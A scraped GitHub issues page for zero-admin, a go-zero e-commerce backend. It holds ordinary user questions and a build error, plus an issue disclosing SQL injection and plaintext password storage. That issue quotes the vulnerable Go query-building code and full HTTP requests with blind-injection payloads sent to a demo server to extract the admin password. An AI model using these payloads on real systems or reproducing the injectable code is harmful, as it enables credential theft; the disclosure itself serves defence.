feihua / zero-admin Goto Github PK

View Code? Open in Web Editor NEW

638.0 13.0 165.0 5.73 MB

Zero-Admin 是一套基于 go-zero 框架实现的电商系统的后端服务

Home Page: https://feihua.github.io

License: Apache License 2.0

Go 98.77% Dockerfile 0.41% Shell 0.13% Makefile 0.44% Batchfile 0.25%

golang go go-zero docker mall shop

zero-admin's People

Contributors

Stargazers

Watchers

Forkers

xiongdi9456 zhaolei0518 cuczhangyi wuchunfu loocor gaodihu kennylixi chree188 erichen86 loyalpartner lynzhai dawei-gege flyowl simman angerymen nacle830213 zhoujin960157994 halcyondaysssss arbullzhang zzjrkt golango-cn bingws baiqr zhaokai5520 coien1983 2008shishi lwl-soft-go stonehao njdxd tapide honeyandroid hxoreyer lovepepsi ifishnet zhuyu caesarchan simplelovecs huanhuande quququcc andonglong changzhi777 alanlv nndaaa simpleliyu mingqi420 seagulltoad 78182648 chutonghai damonxiong lzmai shaohongwu chendongming0625 wooodhead keeptrying anyone0034 archerzdip vivicai ljh562778946-code panjm scorpio69t jy1985429 gk4589210 panjf2008 cgc1983 987763485 jadegeek tuowt billmi sasachen caohui123 feiliu3k yumenghu niuernihao xuhande deegar mycat2022 ldc1481 royswale dannyzml forgeries lzwcyd gerardhb jackjie2016 wuyoushe athmoon yshanchui gkuanine pockees zhaoyadong00 xulongnr xiayexing cogidoo2015 longjinbing c2cn mazikai002 kotlin2018 menyu1113 gonhon platformcn blessli

zero-admin's Issues

SysLogAdd这个方法对应的就是操作日志吧，我没有找到项目没有用到这个方法，是没有调用吗？，还是我没有看到呀

你好想请问下项目命名的规范

有看到过go-zero,建议的文件命名规范是小写不要加_
我看到本项目,大部分目录和文件名的命名都是多个单词没有分割,全部用小写,这样做的目的是什么,没有分隔符看着会有一点怪
另外看到有两个目录front-api,common/errorx又是这样命名的.

怎么运行这个程序呢？

线上部署的预览地址没有菜单

您好，线上预览地址http://139.159.180.129:81/mall ，现在访问是没有菜单显示，是不是最新发包出错了？

【bug】sms编译失败

执行docker build -t sms:v1 -f rpc/sms/Dockerfile .时报错：

#0 212.4 # zero-admin/rpc/sms/internal/logic/couponproductcategoryrelationservice
#0 212.4 rpc/sms/internal/logic/couponproductcategoryrelationservice/couponproductcategoryrelationlistlogic.go:27:79: in.Current undefined (type *smsclient.CouponProductCategoryRelationListReq has no field or method Current)
#0 212.4 rpc/sms/internal/logic/couponproductcategoryrelationservice/couponproductcategoryrelationlistlogic.go:27:91: in.PageSize undefined (type *smsclient.CouponProductCategoryRelationListReq has no field or method PageSize)
#0 212.4 # zero-admin/rpc/sms/internal/logic/couponproductrelationservice
#0 212.4 rpc/sms/internal/logic/couponproductrelationservice/couponproductrelationlistlogic.go:27:71: in.Current undefined (type *smsclient.CouponProductRelationListReq has no field or method Current)
#0 212.4 rpc/sms/internal/logic/couponproductrelationservice/couponproductrelationlistlogic.go:27:83: in.PageSize undefined (type *smsclient.CouponProductRelationListReq has no field or method PageSize)
------
Dockerfile:13
--------------------
  11 |     RUN sh -c "[ -f go.mod ]" || exit
  12 |     COPY rpc/sms/etc /app/etc
  13 | >>> RUN go build -ldflags="-s -w" -o /app/sms rpc/sms/sms.go
  14 |     
  15 |     
--------------------
ERROR: failed to solve: process "/bin/sh -c go build -ldflags=\"-s -w\" -o /app/sms rpc/sms/sms.go" did not complete successfully: exit code: 1

原因是这个提交 4c14598 将zero-admin\rpc\sms\smsclient\sms.pb.go中CouponProductCategoryRelationListReq中的Current、PageSize字段去除了，但是以下2处仍然依赖了Current、PageSize字段。

zero-admin\rpc\sms\internal\logic\couponproductcategoryrelationservice\couponproductcategoryrelationlistlogic.go中的方法CouponProductCategoryRelationList
zero-admin\rpc\sms\internal\logic\couponproductrelationservice\couponproductrelationlistlogic.go中的方法CouponProductRelationList

用户权限管理是用什么实现的？

casbin在用户权限这块用得比较多，但是go.mod里没看到casbin, 请教下本项目是怎么实现用户权限分配和管理的。

预览网站登录不了

{userName: "admin", password: "123456", autoLogin: true, type: "account"}

rpc error: code = Unknown desc = 用户密码不正确

sql 注入获取其他账号密码

此处代码对应的路由是 /api/sys/user/list

zero-admin/rpc/model/sysmodel/sysusermodel.go

Lines 61 to 84 in 744dccf

    
           func (m *customSysUserModel) FindAll(ctx context.Context, in *sysclient.UserListReq) (*[]SysUserList, error) { 
        
           	where := "1=1" 
        
           	if len(in.Name) > 0 { 
        
           		where = where + fmt.Sprintf(" AND sys_user.name like '%%%s%%'", in.Name) 
        
           	} 
        
           	if len(in.Mobile) > 0 { 
        
           		where = where + fmt.Sprintf(" AND sys_user.mobile like '%%%s%%'", in.Mobile) 
        
           	} 
        
           	if in.Status != 2 { 
        
           		where = where + fmt.Sprintf(" AND sys_user.status = %d", in.Status) 
        
           	} 
        
           	where = where + fmt.Sprint(" ORDER BY create_time DESC") 
        
           	query := fmt.Sprintf("select sys_user.*, ifnull(sj.job_name,'') as job_name, ifnull(sd.name ,'')as dept_name, ifnull(sys_role.name,'') as role_name,ifnull(sys_role.id ,'0')as role_id from sys_user   left join sys_user_role sur on sys_user.id = sur.user_id   left join sys_role on sur.role_id = sys_role.id    left join sys_job sj on sys_user.job_id = sj.id left join sys_dept sd on sys_user.dept_id = sd.id where %s limit ?,?", where) 
        
           	var resp []SysUserList 
        
           	err := m.conn.QueryRows(&resp, query, (in.Current-1)*in.PageSize, in.PageSize) 
        
           	switch err { 
        
           	case nil: 
        
           		return &resp, nil 
        
           	case sqlc.ErrNotFound: 
        
           		return nil, ErrNotFound 
        
           	default: 
        
           		return nil, err 
        
           	} 
        
           }

这段代码查的是带有账号密码字段的数据表，而且存在 sql 注入
数据库密码明文存储

那就可以使用布尔盲注挨个匹配出其他账号的密码明文

已知 demo 网站 admin 密码是 123456
此处做一个简单的注入判断

sys_user.username like '%admin' AND sys_user.passsword like '124%' 无匹配

POST http://110.41.179.89/api/sys/user/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 75
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/user/list/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"current":1,"pageSize":10,"name":"admin' AND sys_user.password like '124"}

sys_user.username like '%admin' AND sys_user.passsword like '123456%' 匹配成功

POST http://110.41.179.89/api/sys/user/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 78
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/user/list/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"current":1,"pageSize":10,"name":"admin' AND sys_user.password like '123456"}

sql 注入

此处代码对应的路由是 /api/sys/dict/list

zero-admin/rpc/model/sysmodel/sysdictmodel.go

Lines 36 to 58 in 744dccf

    
           func (m *customSysDictModel) FindAll(ctx context.Context, in *sysclient.DictListReq) (*[]SysDict, error) { 
        
           	where := "1=1" 
        
           	if len(in.Type) > 0 { 
        
           		where = where + fmt.Sprintf(" AND type like '%%%s%%'", in.Type) 
        
           	} 
        
           	if len(in.Label) > 0 { 
        
           		where = where + fmt.Sprintf(" AND label like '%%%s%%'", in.Label) 
        
           	} 
        
           	if in.DelFlag != 2 { 
        
           		where = where + fmt.Sprintf(" AND del_flag = %d", in.DelFlag) 
        
           	} 
        
           	query := fmt.Sprintf("select %s from %s where %s limit ?,?", sysDictRows, m.table, where) 
        
           	var resp []SysDict 
        
           	err := m.conn.QueryRows(&resp, query, (in.Current-1)*in.PageSize, in.PageSize) 
        
           	switch err { 
        
           	case nil: 
        
           		return &resp, nil 
        
           	case sqlc.ErrNotFound: 
        
           		return nil, ErrNotFound 
        
           	default: 
        
           		return nil, err 
        
           	} 
        
           }

POST http://110.41.179.89/api/sys/dict/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 77
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/dict/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"current":1,"pageSize":1,"type":"1919810%' OR id = 2 AND '114514' like '%1"}

SysMenu struct {
	BackgroundUrl  string    `db:"background_url"`   // 后台地址
}

	func (m customSysUserModel) FindAll(ctx context.Context, in sysclient.UserListReq) (*[]SysUserList, error) {
	where := "1=1"
	if len(in.Name) > 0 {
	where = where + fmt.Sprintf(" AND sys_user.name like '%%%s%%'", in.Name)
	}
	if len(in.Mobile) > 0 {
	where = where + fmt.Sprintf(" AND sys_user.mobile like '%%%s%%'", in.Mobile)
	}
	if in.Status != 2 {
	where = where + fmt.Sprintf(" AND sys_user.status = %d", in.Status)
	}
	where = where + fmt.Sprint(" ORDER BY create_time DESC")
	query := fmt.Sprintf("select sys_user.*, ifnull(sj.job_name,'') as job_name, ifnull(sd.name ,'')as dept_name, ifnull(sys_role.name,'') as role_name,ifnull(sys_role.id ,'0')as role_id from sys_user left join sys_user_role sur on sys_user.id = sur.user_id left join sys_role on sur.role_id = sys_role.id left join sys_job sj on sys_user.job_id = sj.id left join sys_dept sd on sys_user.dept_id = sd.id where %s limit ?,?", where)
	var resp []SysUserList
	err := m.conn.QueryRows(&resp, query, (in.Current-1)*in.PageSize, in.PageSize)
	switch err {
	case nil:
	return &resp, nil
	case sqlc.ErrNotFound:
	return nil, ErrNotFound
	default:
	return nil, err
	}
	}

	func (m customSysDictModel) FindAll(ctx context.Context, in sysclient.DictListReq) (*[]SysDict, error) {
	where := "1=1"
	if len(in.Type) > 0 {
	where = where + fmt.Sprintf(" AND type like '%%%s%%'", in.Type)
	}
	if len(in.Label) > 0 {
	where = where + fmt.Sprintf(" AND label like '%%%s%%'", in.Label)
	}
	if in.DelFlag != 2 {
	where = where + fmt.Sprintf(" AND del_flag = %d", in.DelFlag)
	}
	query := fmt.Sprintf("select %s from %s where %s limit ?,?", sysDictRows, m.table, where)
	var resp []SysDict
	err := m.conn.QueryRows(&resp, query, (in.Current-1)*in.PageSize, in.PageSize)
	switch err {
	case nil:
	return &resp, nil
	case sqlc.ErrNotFound:
	return nil, ErrNotFound
	default:
	return nil, err
	}
	}